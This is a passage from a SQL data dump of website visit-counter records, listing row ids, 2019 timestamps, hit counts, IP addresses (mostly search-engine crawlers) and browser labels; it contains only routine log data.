(440198,1565046510,1,1,0,0,'141.8.188.29','other'),(440199,1565048149,1,1,0,0,'207.46.13.183','other'),(440200,1565048891,1,1,0,0,'199.47.87.143','other'),(440201,1565049225,1,1,0,0,'40.77.167.162','other'),(440202,1565049527,1,1,0,0,'66.249.66.220','chrome'),(440203,1565049712,1,1,0,0,'40.77.167.11','other'),(440204,1565049942,1,1,0,0,'66.249.66.222','chrome'),(440205,1565050351,1,1,0,0,'141.8.188.29','other'),(440206,1565051401,1,1,0,0,'141.8.188.29','other'),(440207,1565051415,1,1,0,0,'66.249.66.220','chrome'),(440208,1565051529,1,1,0,0,'66.249.66.128','chrome'),(440209,1565051844,1,1,0,0,'66.249.66.218','chrome'),(440210,1565052938,1,1,0,0,'8.29.198.27','other'),(440211,1565054232,1,1,0,0,'207.46.13.99','other'),(440212,1565055250,1,1,0,0,'8.29.198.25','other'),(440213,1565055540,1,1,0,0,'66.249.66.222','chrome'),(440214,1565055701,1,1,0,0,'207.46.13.99','other'),(440215,1565056090,1,1,0,0,'178.154.200.48','other'),(440216,1565056095,1,1,0,0,'95.108.213.50','other'),(440217,1565056629,1,1,0,0,'157.55.39.4','other'),(440218,1565056885,1,1,0,0,'207.46.13.183','other'),(440219,1565056982,3,3,0,0,'141.8.188.29','other'),(440220,1565057214,2,2,0,0,'66.249.66.218','chrome'),(440221,1565058079,3,3,0,0,'66.249.66.220','chrome'),(440222,1565058135,3,3,0,0,'66.249.66.218','chrome'),(440223,1565058197,1,1,0,0,'66.249.66.222','chrome'),(440224,1565058367,1,1,0,0,'141.8.188.29','other'),(440225,1565059324,2,2,0,0,'66.249.66.218','chrome'),(440226,1565060431,1,1,0,0,'66.249.66.222','chrome'),(440227,1565061060,52,52,0,0,'192.151.145.178','other'),(440228,1565061067,1,1,0,0,'91.209.11.236','other'),(440229,1565061468,1,1,0,0,'207.46.13.30','other'),(440230,1565061982,1,1,0,0,'66.249.66.220','chrome'),(440231,1565062020,1,1,0,0,'66.249.66.128','chrome'),(440232,1565062129,1,1,0,0,'66.249.66.222','chrome'),(440233,1565062170,1,1,0,0,'94.180.145.168','msie'),(440234,1565062203,1,1,0,0,'151.80.41.169','other'),(440235,1565063626,1,1,0,0,'45.86.248.11','chrome'),(440236,1565063628,3,3,0,0,'66.249.66.130','chrome'),(440237,1565063658,2,2,0,0,'157.55.39.90','other'),(440238,1565063790,1,1,0,0,'8.29.198.27','other'),(440239,1565063849,1,1,0,0,'141.8.188.29','other'),(440240,1565064024,1,1,0,0,'66.249.66.220','chrome'),(440241,1565064482,2,2,0,0,'66.249.66.222','chrome'),(440242,1565064587,1,1,0,0,'91.196.178.132','firefox'),(440243,1565064735,3,3,0,0,'207.46.13.183','other'),(440244,1565064919,1,1,0,0,'207.46.13.30','other'),(440245,1565066083,1,1,0,0,'8.29.198.26','other'),(440246,1565066434,1,1,0,0,'66.249.66.128','chrome'),(440247,1565066668,1,1,0,0,'66.249.66.220','chrome'),(440248,1565066744,1,1,0,0,'66.249.66.218','chrome'),(440249,1565066750,1,1,0,0,'207.46.13.30','other'),(440250,1565067761,2,2,0,0,'66.249.66.220','chrome'),(440251,1565068339,1,1,0,0,'141.8.188.29','other'),(440252,1565069164,1,1,0,0,'207.46.13.30','other'),(440253,1565069197,1,1,0,0,'157.55.39.90','other'),(440254,1565069553,1,1,0,0,'37.73.112.166','chrome'),(440255,1565070035,1,1,0,0,'46.201.238.252','chrome'),(440256,1565070952,1,1,0,0,'141.8.188.11','other'),(440257,1565071149,1,1,0,0,'66.249.66.220','chrome'),(440258,1565072155,2,2,0,0,'157.55.39.90','other'),(440259,1565072375,1,1,0,0,'91.196.178.52','chrome'),(440260,1565073003,1,1,0,0,'40.77.167.141','other'),(440261,1565073124,1,1,0,0,'66.249.66.220','chrome'),(440262,1565073394,1,1,0,0,'141.8.188.29','other'),(440263,1565073559,1,1,0,0,'167.71.94.18','other'),(440264,1565073868,2,2,0,0,'66.249.66.222','chrome'),(440265,1565074107,1,1,0,0,'66.249.66.220','chrome'),(440266,1565074131,1,1,0,0,'66.249.66.218','chrome'),(440267,1565074288,2,2,0,0,'157.55.39.173','other'),(440268,1565074637,1,1,0,0,'8.29.198.27','other'),(440269,1565074794,1,1,0,0,'66.249.66.130','chrome'),(440270,1565074927,1,1,0,0,'91.196.178.68','chrome'),(440271,1565075192,1,1,0,0,'66.249.66.222','chrome'),(440272,1565075386,2,2,0,0,'66.249.66.218','chrome'),(440273,1565075487,1,1,0,0,'31.130.203.85','chrome'),(440274,1565075806,2,2,0,0,'157.55.39.90','other'),(440275,1565076354,1,1,0,0,'167.71.96.87','other'),(440276,1565076919,1,1,0,0,'8.29.198.26','other'),(440277,1565077152,1,1,0,0,'66.249.66.222','chrome'),(440278,1565078075,1,1,0,0,'95.132.48.239','firefox'),(440279,1565078919,1,1,0,0,'66.249.66.218','chrome'),(440280,1565078939,1,1,0,0,'157.55.39.58','other'),(440281,1565079149,1,1,0,0,'5.45.207.79','other'),(440282,1565079552,2,2,0,0,'40.77.167.88','other'),(440283,1565079613,2,2,0,0,'141.8.188.29','other'),(440284,1565079729,1,1,0,0,'66.249.66.130','chrome'),(440285,1565079774,1,1,0,0,'176.120.99.77','chrome'),(440286,1565080151,4,4,0,0,'157.55.39.90','other'),(440287,1565080201,2,2,0,0,'66.249.66.218','chrome'),(440288,1565080688,1,1,0,0,'66.249.66.220','chrome'),(440289,1565081225,1,1,0,0,'141.8.188.11','other'),(440290,1565081677,1,1,0,0,'5.45.207.19','other'),(440291,1565082181,1,1,0,0,'5.45.207.79','other'),(440292,1565082227,4,4,0,0,'141.8.188.11','other'),(440293,1565082273,1,1,0,0,'66.249.66.220','chrome'),(440294,1565082518,1,1,0,0,'37.73.77.165','chrome'),(440295,1565082701,1,1,0,0,'66.249.66.218','chrome'),(440296,1565083502,3,3,0,0,'141.8.188.29','other'),(440297,1565083670,1,1,0,0,'66.249.66.130','chrome'),(440298,1565083947,1,1,0,0,'66.249.66.128','chrome'),(440299,1565084453,1,1,0,0,'66.249.66.222','chrome'),(440300,1565084818,2,2,0,0,'157.55.39.58','other'),(440301,1565085156,1,1,0,0,'66.249.66.130','chrome'),(440302,1565085308,2,2,0,0,'40.77.167.88','other'),(440303,1565085421,1,1,0,0,'66.249.66.222','chrome'),(440304,1565085473,1,1,0,0,'8.29.198.25','other'),(440305,1565085613,1,1,0,0,'66.249.66.218','chrome'),(440306,1565085619,1,1,0,0,'37.73.201.251','chrome'),(440307,1565085740,1,1,0,0,'91.209.11.236','other'),(440308,1565085967,1,1,0,0,'141.8.188.29','other'),(440309,1565086814,1,1,0,0,'46.133.61.131','chrome'),(440310,1565087233,1,1,0,0,'157.55.39.153','other'),(440311,1565087664,1,1,0,0,'109.74.154.72','chrome'),(440312,1565087752,1,1,0,0,'8.29.198.26','other'),(440313,1565087864,1,1,0,0,'157.55.39.58','other'),(440314,1565088051,1,1,0,0,'141.8.188.29','other'),(440315,1565088839,1,1,0,0,'66.249.66.222','chrome'),(440316,1565088967,1,1,0,0,'66.249.66.220','chrome'),(440317,1565089055,1,1,0,0,'141.8.188.29','other'),(440318,1565089526,1,1,0,0,'66.249.66.218','chrome'),(440319,1565089552,1,1,0,0,'40.77.167.219','other'),(440320,1565090495,2,2,0,0,'66.249.66.220','chrome'),(440321,1565091828,2,2,0,0,'66.249.66.222','chrome'),(440322,1565092056,1,1,0,0,'141.8.188.11','other'),(440323,1565092202,1,1,0,0,'141.101.134.52','chrome'),(440324,1565092219,2,2,0,0,'157.55.39.153','other'),(440325,1565092248,3,3,0,0,'66.249.66.220','chrome'),(440326,1565092488,1,1,0,0,'91.196.178.94','chrome'),(440327,1565092790,1,1,0,0,'66.249.66.130','chrome'),(440328,1565093229,1,1,0,0,'178.92.9.202','chrome'),(440329,1565093547,1,1,0,0,'40.77.167.219','other'),(440330,1565093926,1,1,0,0,'66.249.66.222','chrome'),(440331,1565093979,1,1,0,0,'40.77.167.4','other'),(440332,1565094055,1,1,0,0,'141.8.188.29','other'),(440333,1565094198,1,1,0,0,'66.249.66.130','chrome'),(440334,1565094793,1,1,0,0,'40.77.167.219','other'),(440335,1565095044,2,2,0,0,'157.55.39.153','other'),(440336,1565095167,1,1,0,0,'157.55.39.58','other'),(440337,1565095176,1,1,0,0,'40.77.167.4','other'),(440338,1565095381,2,2,0,0,'66.249.66.222','chrome'),(440339,1565095456,1,1,0,0,'195.114.136.122','chrome'),(440340,1565095755,1,1,0,0,'141.8.188.29','other'),(440341,1565095923,1,1,0,0,'195.211.174.50','firefox'),(440342,1565095930,1,1,0,0,'66.249.66.130','chrome'),(440343,1565096168,2,2,0,0,'66.249.66.218','chrome'),(440344,1565096210,1,1,0,0,'141.8.188.11','other'),(440345,1565096314,1,1,0,0,'8.29.198.26','other'),(440346,1565096385,1,1,0,0,'66.249.66.220','chrome'),(440347,1565096514,2,2,0,0,'40.77.167.4','other'),(440348,1565096818,1,1,0,0,'66.249.66.222','chrome'),(440349,1565097113,1,1,0,0,'66.249.66.130','chrome'),(440350,1565097391,2,2,0,0,'40.77.167.219','other'),(440351,1565097805,1,1,0,0,'66.249.66.218','chrome'),(440352,1565098584,1,1,0,0,'8.29.198.25','other'),(440353,1565100129,1,1,0,0,'66.249.66.218','chrome'),(440354,1565100180,2,2,0,0,'141.8.188.11','other'),(440355,1565100201,1,1,0,0,'66.249.66.222','chrome'),(440356,1565100510,1,1,0,0,'157.55.39.58','other'),(440357,1565101875,1,1,0,0,'157.55.39.180','other'),(440358,1565101882,2,2,0,0,'157.55.39.58','other'),(440359,1565101885,1,1,0,0,'66.249.66.218','chrome'),(440360,1565101947,1,1,0,0,'66.249.66.220','chrome'),(440361,1565103072,2,2,0,0,'66.249.66.220','chrome'),(440362,1565103493,1,1,0,0,'66.249.66.222','chrome'),(440363,1565104228,1,1,0,0,'66.249.66.220','chrome'),(440364,1565104681,1,1,0,0,'95.220.50.197','msie'),(440365,1565104971,1,1,0,0,'40.77.167.4','other'),(440366,1565105212,1,1,0,0,'66.249.66.130','chrome'),(440367,1565105216,2,2,0,0,'66.249.66.128','chrome'),(440368,1565105750,2,2,0,0,'193.169.252.27','chrome'),(440369,1565105994,1,1,0,0,'66.249.66.220','chrome'),(440370,1565106013,2,2,0,0,'66.249.66.218','chrome'),(440371,1565106917,1,1,0,0,'157.55.39.180','other'),(440372,1565106999,1,1,0,0,'66.249.66.132','chrome'),(440373,1565107156,1,1,0,0,'8.29.198.25','other'),(440374,1565107162,2,2,0,0,'66.249.66.218','chrome'),(440375,1565107718,1,1,0,0,'66.249.66.222','chrome'),(440376,1565108061,2,2,0,0,'66.249.66.220','chrome'),(440377,1565108100,1,1,0,0,'40.77.167.219','other'),(440378,1565109120,1,1,0,0,'157.55.39.180','other'),(440379,1565109150,2,2,0,0,'40.77.167.138','other'),(440380,1565109275,2,2,0,0,'66.249.66.222','chrome'),(440381,1565109414,1,1,0,0,'8.29.198.27','other'),(440382,1565109709,1,1,0,0,'40.77.167.100','other'),(440383,1565110000,1,1,0,0,'66.249.66.220','chrome'),(440384,1565110934,1,1,0,0,'13.66.139.0','other'),(440385,1565110967,1,1,0,0,'66.249.66.222','chrome'),(440386,1565111044,1,1,0,0,'66.249.66.218','chrome'),(440387,1565111500,1,1,0,0,'141.8.188.29','other'),(440388,1565111501,1,1,0,0,'141.8.188.11','other'),(440389,1565111818,1,1,0,0,'91.196.178.39','chrome'),(440390,1565112071,4,4,0,0,'66.249.66.220','chrome'),(440391,1565112094,2,2,0,0,'66.249.66.130','chrome'),(440392,1565112245,3,3,0,0,'66.249.66.222','chrome'),(440393,1565112284,1,1,0,0,'66.249.66.132','chrome'),(440394,1565112450,1,1,0,0,'91.209.11.236','other'),(440395,1565112476,1,1,0,0,'66.249.66.128','chrome'),(440396,1565113146,1,1,0,0,'66.249.66.220','chrome'),(440397,1565113622,1,1,0,0,'40.77.167.100','other'),(440398,1565113998,1,1,0,0,'180.76.15.22','other'),(440399,1565114121,1,1,0,0,'157.55.39.141','other'),(440400,1565114417,1,1,0,0,'66.249.66.220','chrome'),(440401,1565114546,3,3,0,0,'66.249.66.222','chrome'),(440402,1565114650,1,1,0,0,'66.249.66.130','chrome'),(440403,1565114771,4,4,0,0,'66.249.66.218','chrome'),(440404,1565115688,1,1,0,0,'40.77.167.135','other'),(440405,1565115997,1,1,0,0,'180.76.15.28','other'),(440406,1565116083,85,85,0,0,'192.151.145.178','other'),(440407,1565116290,1,1,0,0,'157.55.39.180','other'),(440408,1565117075,2,2,0,0,'66.249.66.218','chrome'),(440409,1565117255,1,1,0,0,'157.55.39.85','other'),(440410,1565117561,1,1,0,0,'157.55.39.180','other'),(440411,1565117997,1,1,0,0,'180.76.15.14','other'),(440412,1565118004,1,1,0,0,'8.29.198.27','other'),(440413,1565118698,1,1,0,0,'66.249.66.132','chrome'),(440414,1565118780,1,1,0,0,'66.249.66.128','chrome'),(440415,1565119025,1,1,0,0,'157.55.39.180','other'),(440416,1565119129,1,1,0,0,'40.77.167.135','other'),(440417,1565120161,1,1,0,0,'180.76.15.26','other'),(440418,1565120204,3,3,0,0,'40.77.167.100','other'),(440419,1565120263,1,1,0,0,'8.29.198.26','other'),(440420,1565120307,2,2,0,0,'66.249.66.222','chrome'),(440421,1565120385,1,1,0,0,'91.196.178.131','firefox'),(440422,1565120681,2,2,0,0,'66.249.66.220','chrome'),(440423,1565120935,2,2,0,0,'66.249.66.218','chrome'),(440424,1565121237,2,2,0,0,'40.77.167.100','other'),(440425,1565121455,1,1,0,0,'157.55.39.85','other'),(440426,1565121625,2,2,0,0,'66.249.66.222','chrome'),(440427,1565121964,3,3,0,0,'66.249.66.220','chrome'),(440428,1565121990,2,2,0,0,'66.249.66.218','chrome'),(440429,1565123873,4,4,0,0,'66.249.66.218','chrome'),(440430,1565123920,2,2,0,0,'66.249.66.220','chrome'),(440431,1565125142,1,1,0,0,'40.77.167.215','other'),(440432,1565125166,1,1,0,0,'202.46.51.175','chrome'),(440433,1565125422,1,1,0,0,'157.55.39.85','other'),(440434,1565125929,1,1,0,0,'40.77.167.82','other'),(440435,1565126388,1,1,0,0,'66.249.66.222','chrome'),(440436,1565126553,2,2,0,0,'66.249.66.220','chrome'),(440437,1565126910,1,1,0,0,'40.77.167.215','other'),(440438,1565127081,1,1,0,0,'141.8.188.29','other'),(440439,1565128186,1,1,0,0,'66.249.66.220','chrome'),(440440,1565128426,1,1,0,0,'91.209.11.236','other'),(440441,1565128848,1,1,0,0,'8.29.198.25','other'),(440442,1565128982,2,2,0,0,'66.249.66.218','chrome'),(440443,1565129137,2,2,0,0,'66.249.66.130','chrome'),(440444,1565129333,3,3,0,0,'66.249.66.222','chrome'),(440445,1565129464,2,2,0,0,'66.249.66.220','chrome'),(440446,1565130673,1,1,0,0,'5.255.253.22','other'),(440447,1565130720,1,1,0,0,'40.77.167.215','other'),(440448,1565130758,3,3,0,0,'66.249.66.81','chrome'),(440449,1565130960,3,3,0,0,'66.249.66.83','chrome'),(440450,1565131094,1,1,0,0,'8.29.198.26','other'),(440451,1565131420,1,1,0,0,'66.249.66.82','chrome'),(440452,1565131736,1,1,0,0,'141.8.188.29','other'),(440453,1565133328,1,1,0,0,'66.249.66.81','chrome'),(440454,1565133347,1,1,0,0,'157.55.39.185','other'),(440455,1565134657,1,1,0,0,'157.55.39.85','other'),(440456,1565134720,1,1,0,0,'66.249.66.81','chrome'),(440457,1565135242,1,1,0,0,'66.249.66.83','chrome'),(440458,1565135409,2,2,0,0,'157.55.39.185','other'),(440459,1565136090,1,1,0,0,'37.204.201.114','msie'),(440460,1565136302,1,1,0,0,'66.249.66.83','chrome'),(440461,1565136453,2,2,0,0,'66.249.66.218','chrome'),(440462,1565136500,1,1,0,0,'66.249.66.220','chrome'),(440463,1565136611,1,1,0,0,'66.249.66.82','chrome'),(440464,1565136836,2,2,0,0,'66.249.66.222','chrome'),(440465,1565137106,1,1,0,0,'66.249.66.81','chrome'),(440466,1565137661,1,1,0,0,'157.55.39.85','other'),(440467,1565138071,2,2,0,0,'66.249.66.193','chrome'),(440468,1565138110,1,1,0,0,'66.249.66.198','chrome'),(440469,1565138163,1,1,0,0,'66.249.66.68','chrome'),(440470,1565138207,1,1,0,0,'157.55.39.185','other'),(440471,1565138320,5,5,0,0,'66.249.66.196','chrome'),(440472,1565138361,1,1,0,0,'66.249.66.64','chrome'),(440473,1565138691,1,1,0,0,'141.8.188.29','other'),(440474,1565139015,1,1,0,0,'178.154.171.24','other'),(440475,1565139066,1,1,0,0,'66.249.66.193','chrome'),(440476,1565139697,1,1,0,0,'8.29.198.25','other'),(440477,1565139882,1,1,0,0,'40.77.167.76','other'),(440478,1565140166,1,1,0,0,'66.249.66.68','chrome'),(440479,1565140266,1,1,0,0,'66.249.66.66','chrome'),(440480,1565140489,1,1,0,0,'66.249.66.196','chrome'),(440481,1565141012,1,1,0,0,'157.55.39.185','other'),(440482,1565141083,1,1,0,0,'193.106.30.99','chrome'),(440483,1565141916,1,1,0,0,'8.29.198.27','other'),(440484,1565142089,1,1,0,0,'66.249.66.198','chrome'),(440485,1565142906,1,1,0,0,'66.249.66.193','chrome'),(440486,1565142913,1,1,0,0,'66.249.66.196','chrome'),(440487,1565143507,1,1,0,0,'207.46.13.137','other'),(440488,1565144069,1,1,0,0,'66.249.66.198','chrome'),(440489,1565144450,4,4,0,0,'66.249.66.193','chrome'),(440490,1565144756,1,1,0,0,'66.249.66.64','chrome'),(440491,1565145464,2,2,0,0,'207.46.13.137','other'),(440492,1565145970,1,1,0,0,'141.8.188.29','other'),(440493,1565146809,2,2,0,0,'66.249.66.193','chrome'),(440494,1565146932,1,1,0,0,'66.249.66.198','chrome'),(440495,1565147108,1,1,0,0,'141.8.188.29','other'),(440496,1565147256,1,1,0,0,'66.249.66.64','chrome'),(440497,1565147300,1,1,0,0,'207.46.13.137','other'),(440498,1565147389,1,1,0,0,'157.55.39.149','other'),(440499,1565147493,2,2,0,0,'66.249.66.196','chrome'),(440500,1565148280,1,1,0,0,'141.8.188.29','other'),(440501,1565149353,3,3,0,0,'66.249.66.222','chrome'),(440502,1565149380,4,4,0,0,'66.249.66.218','chrome'),(440503,1565149593,1,1,0,0,'66.249.66.158','chrome'),(440504,1565149609,2,2,0,0,'66.249.66.220','chrome'),(440505,1565149619,1,1,0,0,'66.249.66.157','chrome'),(440506,1565150031,1,1,0,0,'40.77.167.69','other'),(440507,1565150304,1,1,0,0,'66.249.66.222','chrome'),(440508,1565150535,1,1,0,0,'8.29.198.27','other'),(440509,1565151213,1,1,0,0,'66.249.66.218','chrome'),(440510,1565151793,1,1,0,0,'66.249.66.220','chrome'),(440511,1565152378,1,1,0,0,'13.66.139.0','other'),(440512,1565152755,1,1,0,0,'8.29.198.25','other'),(440513,1565152892,1,1,0,0,'66.249.66.218','chrome'),(440514,1565153849,1,1,0,0,'66.249.66.222','chrome'),(440515,1565154361,1,1,0,0,'66.249.66.157','chrome'),(440516,1565154749,1,1,0,0,'141.8.188.11','other'),(440517,1565155891,1,1,0,0,'66.249.66.222','chrome'),(440518,1565155901,1,1,0,0,'66.249.66.218','chrome'),(440519,1565156000,2,2,0,0,'66.249.66.220','chrome'),(440520,1565156774,1,1,0,0,'66.249.66.157','chrome'),(440521,1565157109,1,1,0,0,'185.220.101.20','other'),(440522,1565157450,1,1,0,0,'91.196.179.134','chrome'),(440523,1565157704,1,1,0,0,'66.249.66.222','chrome'),(440524,1565157786,1,1,0,0,'66.249.66.218','chrome'),(440525,1565158431,1,1,0,0,'141.8.188.11','other'),(440526,1565158467,1,1,0,0,'91.196.178.89','chrome'),(440527,1565158906,1,1,0,0,'94.178.7.206','chrome'),(440528,1565159211,1,1,0,0,'40.77.167.69','other'),(440529,1565159281,2,2,0,0,'40.77.167.8','other'),(440530,1565159287,1,1,0,0,'66.249.66.220','chrome'),(440531,1565159712,1,1,0,0,'91.236.184.20','chrome'),(440532,1565160773,3,3,0,0,'66.249.66.220','chrome'),(440533,1565161042,1,1,0,0,'66.249.66.218','chrome'),(440534,1565161367,1,1,0,0,'8.29.198.26','other'),(440535,1565161500,1,1,0,0,'66.249.66.157','chrome'),(440536,1565162031,4,4,0,0,'40.77.167.8','other'),(440537,1565162429,4,4,0,0,'157.55.39.118','other'),(440538,1565162583,4,4,0,0,'66.249.66.222','chrome'),(440539,1565162673,1,1,0,0,'66.249.66.218','chrome'),(440540,1565162705,3,3,0,0,'207.46.13.149','other'),(440541,1565162710,5,5,0,0,'40.77.167.69','other'),(440542,1565163409,1,1,0,0,'66.249.66.157','chrome'),(440543,1565163599,1,1,0,0,'8.29.198.26','other'),(440544,1565163787,3,3,0,0,'66.249.66.218','chrome'),(440545,1565163807,1,1,0,0,'91.196.178.93','chrome'),(440546,1565163851,1,1,0,0,'46.211.132.95','chrome'),(440547,1565163915,1,1,0,0,'207.46.13.149','other'),(440548,1565163956,1,1,0,0,'40.77.167.69','other'),(440549,1565164075,1,1,0,0,'77.120.18.68','chrome'),(440550,1565164258,1,1,0,0,'91.196.178.167','chrome'),(440551,1565164987,2,2,0,0,'66.249.66.218','chrome'),(440552,1565165138,1,1,0,0,'66.249.66.220','chrome'),(440553,1565165385,1,1,0,0,'37.73.69.239','chrome'),(440554,1565165465,1,1,0,0,'157.55.39.104','other'),(440555,1565165471,1,1,0,0,'66.249.66.222','chrome'),(440556,1565165780,1,1,0,0,'66.249.66.157','chrome'),(440557,1565167373,1,1,0,0,'94.100.221.234','chrome'),(440558,1565167378,2,2,0,0,'66.249.66.220','chrome'),(440559,1565167435,2,2,0,0,'66.249.66.218','chrome'),(440560,1565167539,1,1,0,0,'157.55.39.245','other'),(440561,1565168882,1,1,0,0,'157.55.39.118','other'),(440562,1565168994,1,1,0,0,'141.8.188.21','other'),(440563,1565169029,2,2,0,0,'193.169.252.27','chrome'),(440564,1565170780,3,3,0,0,'66.249.66.218','chrome'),(440565,1565172193,1,1,0,0,'8.29.198.25','other'),(440566,1565172482,1,1,0,0,'157.55.39.245','other'),(440567,1565172567,1,1,0,0,'66.249.66.157','chrome'),(440568,1565172762,2,2,0,0,'66.249.66.222','chrome'),(440569,1565173163,1,1,0,0,'109.74.154.72','chrome'),(440570,1565173348,1,1,0,0,'89.163.242.241','opera'),(440571,1565174387,1,1,0,0,'141.8.188.11','other'),(440572,1565174390,1,1,0,0,'141.8.188.29','other'),(440573,1565174404,2,2,0,0,'95.213.141.126','opera'),(440574,1565174434,1,1,0,0,'8.29.198.27','other'),(440575,1565174640,2,2,0,0,'66.249.66.220','chrome'),(440576,1565174759,1,1,0,0,'66.249.66.222','chrome'),(440577,1565175404,1,1,0,0,'181.214.188.157','other'),(440578,1565175965,1,1,0,0,'66.249.66.222','chrome'),(440579,1565176418,2,2,0,0,'66.249.66.220','chrome'),(440580,1565176420,1,1,0,0,'66.249.66.218','chrome'),(440581,1565176836,1,1,0,0,'157.55.39.143','other'),(440582,1565177175,1,1,0,0,'91.196.178.78','chrome'),(440583,1565177639,1,1,0,0,'157.55.39.245','other'),(440584,1565177691,1,1,0,0,'141.8.188.29','other'),(440585,1565177703,1,1,0,0,'157.55.39.118','other'),(440586,1565178138,1,1,0,0,'66.249.66.158','chrome'),(440587,1565178224,1,1,0,0,'66.249.66.159','chrome'),(440588,1565178428,1,1,0,0,'66.249.66.222','chrome'),(440589,1565179634,1,1,0,0,'66.249.66.222','chrome'),(440590,1565179712,1,1,0,0,'66.249.66.159','chrome'),(440591,1565179766,1,1,0,0,'66.249.66.158','chrome'),(440592,1565180553,2,2,0,0,'157.55.39.143','other'),(440593,1565180714,1,1,0,0,'66.249.66.220','chrome'),(440594,1565181045,1,1,0,0,'95.108.213.50','other'),(440595,1565181208,1,1,0,0,'141.8.188.29','other'),(440596,1565181346,2,2,0,0,'66.249.66.222','chrome'),(440597,1565181445,1,1,0,0,'66.249.66.218','chrome'),(440598,1565182406,1,1,0,0,'66.249.66.222','chrome'),(440599,1565183041,1,1,0,0,'8.29.198.27','other'),(440600,1565183104,2,2,0,0,'141.8.188.29','other'),(440601,1565183525,2,2,0,0,'66.249.66.159','chrome'),(440602,1565183568,2,2,0,0,'66.249.66.222','chrome'),(440603,1565183867,1,1,0,0,'46.219.223.83','firefox'),(440604,1565183901,1,1,0,0,'141.101.134.52','chrome'),(440605,1565184091,1,1,0,0,'66.249.66.220','chrome'),(440606,1565185084,2,2,0,0,'66.249.66.220','chrome'),(440607,1565185088,4,4,0,0,'66.249.66.218','chrome'),(440608,1565185255,1,1,0,0,'66.249.66.222','chrome'),(440609,1565185274,1,1,0,0,'8.29.198.25','other'),(440610,1565185404,1,1,0,0,'157.55.39.143','other'),(440611,1565185891,1,1,0,0,'91.196.178.78','chrome'),(440612,1565186042,2,2,0,0,'157.55.39.149','other'),(440613,1565186295,1,1,0,0,'66.249.66.159','chrome'),(440614,1565186309,1,1,0,0,'66.249.66.220','chrome'),(440615,1565187548,1,1,0,0,'176.36.185.164','firefox'),(440616,1565187832,2,2,0,0,'66.249.66.218','chrome'),(440617,1565188116,1,1,0,0,'66.249.66.222','chrome'),(440618,1565188500,1,1,0,0,'66.249.66.156','chrome'),(440619,1565189937,1,1,0,0,'66.249.66.222','chrome'),(440620,1565191584,1,1,0,0,'66.249.66.222','chrome'),(440621,1565191593,2,2,0,0,'66.249.66.218','chrome'),(440622,1565191865,1,1,0,0,'66.249.66.159','chrome'),(440623,1565192615,2,2,0,0,'13.66.139.0','other'),(440624,1565193117,1,1,0,0,'66.249.66.158','chrome'),(440625,1565193167,3,3,0,0,'66.249.66.218','chrome'),(440626,1565193196,1,1,0,0,'66.249.66.157','chrome'),(440627,1565193236,2,2,0,0,'66.249.66.220','chrome'),(440628,1565193498,1,1,0,0,'66.249.66.222','chrome'),(440629,1565193884,1,1,0,0,'8.29.198.26','other'),(440630,1565194221,1,1,0,0,'207.46.13.233','other'),(440631,1565194441,1,1,0,0,'66.249.66.210','chrome'),(440632,1565194513,1,1,0,0,'193.106.30.99','chrome'),(440633,1565195123,2,2,0,0,'66.249.66.158','chrome'),(440634,1565195199,4,4,0,0,'66.249.66.218','chrome'),(440635,1565195769,2,2,0,0,'66.249.66.220','chrome'),(440636,1565196109,1,1,0,0,'8.29.198.27','other'),(440637,1565197566,1,1,0,0,'207.46.13.233','other'),(440638,1565197808,1,1,0,0,'66.249.66.80','chrome'),(440639,1565197843,1,1,0,0,'66.249.66.206','chrome'),(440640,1565198359,1,1,0,0,'157.55.39.149','other'),(440641,1565199355,1,1,0,0,'95.163.212.58','chrome'),(440642,1565199833,2,2,0,0,'66.249.66.220','chrome'),(440643,1565199964,1,1,0,0,'66.249.66.157','chrome'),(440644,1565200713,2,2,0,0,'157.55.39.124','other'),(440645,1565201604,1,1,0,0,'66.249.66.158','chrome'),(440646,1565201619,1,1,0,0,'66.249.66.218','chrome'),(440647,1565201941,2,2,0,0,'66.249.66.220','chrome'),(440648,1565202786,1,1,0,0,'66.249.66.222','chrome'),(440649,1565202909,1,1,0,0,'66.249.66.220','chrome'),(440650,1565203274,1,1,0,0,'66.249.66.158','chrome'),(440651,1565203291,2,2,0,0,'66.249.66.218','chrome'),(440652,1565203845,1,1,0,0,'66.249.66.220','chrome'),(440653,1565204391,2,2,0,0,'157.55.39.46','other'),(440654,1565204645,1,1,0,0,'89.208.86.230','chrome'),(440655,1565204685,3,3,0,0,'66.249.66.222','chrome'),(440656,1565204694,1,1,0,0,'66.249.66.218','chrome'),(440657,1565204738,1,1,0,0,'8.29.198.26','other'),(440658,1565204834,1,1,0,0,'66.249.66.220','chrome'),(440659,1565205741,1,1,0,0,'66.249.66.218','chrome'),(440660,1565207442,1,1,0,0,'8.29.198.27','other'),(440661,1565207595,1,1,0,0,'202.46.52.119','chrome'),(440662,1565207612,2,2,0,0,'66.249.66.220','chrome'),(440663,1565208520,1,1,0,0,'66.249.66.157','chrome'),(440664,1565208530,1,1,0,0,'128.124.64.254','chrome'),(440665,1565208641,2,2,0,0,'66.249.66.218','chrome'),(440666,1565208717,1,1,0,0,'157.55.39.46','other'),(440667,1565210049,1,1,0,0,'5.9.156.20','other'),(440668,1565210153,2,2,0,0,'66.249.66.222','chrome'),(440669,1565210269,1,1,0,0,'66.249.66.220','chrome'),(440670,1565210654,1,1,0,0,'95.108.181.57','other'),(440671,1565211135,2,2,0,0,'69.58.178.59','other'),(440672,1565211194,2,2,0,0,'148.251.41.239','other'),(440673,1565211741,1,1,0,0,'66.249.66.218','chrome'),(440674,1565211810,2,2,0,0,'141.8.188.11','other'),(440675,1565211817,1,1,0,0,'157.55.39.149','other'),(440676,1565211842,2,2,0,0,'66.249.66.220','chrome'),(440677,1565212100,1,1,0,0,'66.249.66.159','chrome'),(440678,1565212130,1,1,0,0,'13.66.139.0','other'),(440679,1565212167,2,2,0,0,'66.249.66.222','chrome'),(440680,1565212898,1,1,0,0,'66.249.66.220','chrome'),(440681,1565212903,1,1,0,0,'141.8.188.29','other'),(440682,1565213167,1,1,0,0,'37.9.113.20','other'),(440683,1565214011,1,1,0,0,'87.250.224.47','other'),(440684,1565214323,2,2,0,0,'66.249.66.218','chrome'),(440685,1565215517,1,1,0,0,'207.46.13.192','other'),(440686,1565215585,1,1,0,0,'8.29.198.27','other'),(440687,1565215799,1,1,0,0,'66.249.66.220','chrome'),(440688,1565215858,2,2,0,0,'66.249.66.218','chrome'),(440689,1565216473,1,1,0,0,'66.249.66.222','chrome'),(440690,1565216781,1,1,0,0,'141.101.134.52','chrome'),(440691,1565217578,1,1,0,0,'66.249.66.222','chrome'),(440692,1565217600,1,1,0,0,'207.46.13.168','other'),(440693,1565217788,1,1,0,0,'157.55.39.175','other'),(440694,1565217836,2,2,0,0,'66.249.66.220','chrome'),(440695,1565